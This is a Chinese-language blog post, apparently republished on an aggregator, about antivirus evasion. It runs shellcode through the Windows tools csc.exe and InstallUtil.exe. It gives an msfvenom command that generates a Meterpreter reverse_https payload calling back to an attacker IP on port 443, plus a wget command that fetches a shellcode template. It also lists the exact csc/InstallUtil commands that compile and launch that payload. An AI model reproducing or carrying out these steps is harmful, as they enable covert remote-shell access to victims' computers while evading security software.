payload免杀之Installutil.exe&csc.exe利用

Posted whoami101

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了payload免杀之Installutil.exe&csc.exe利用相关的知识,希望对你有一定的参考价值。

0x00 前言

C#的在Windows平台下的编译器名称是Csc.exe。Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。

 

0x01 利用过程

 

1.下载shellcode.cs

wget https://github.com/222222amor/exp_notes/blob/master/InstallUtil-Shellcode-cs

我这里使用cobalt strike的shellcode,你也可以使用msf的shellcode,命令如下:

msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt

 

2.编译并执行

C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs

C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

或者 C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

 

绕过的流程图

 技术图片

 

 

但是现实很骨感。已经被某60杀了。

技术图片

 

 

 

 

以上是关于payload免杀之Installutil.exe&csc.exe利用的主要内容,如果未能解决你的问题,请参考以下文章

Delphi函数动态调用实现免杀

免杀Payload生成工具Veil的下载与使用

Kali-linux免杀Payload生成工具Veil

远控免杀专题(55)-白名单Pcalua.exe执行payload

使用 SC.exe 或 InstallUtil.exe 安装 Windows 服务 - 有区别,但哪个?

installutil.exe怎么运行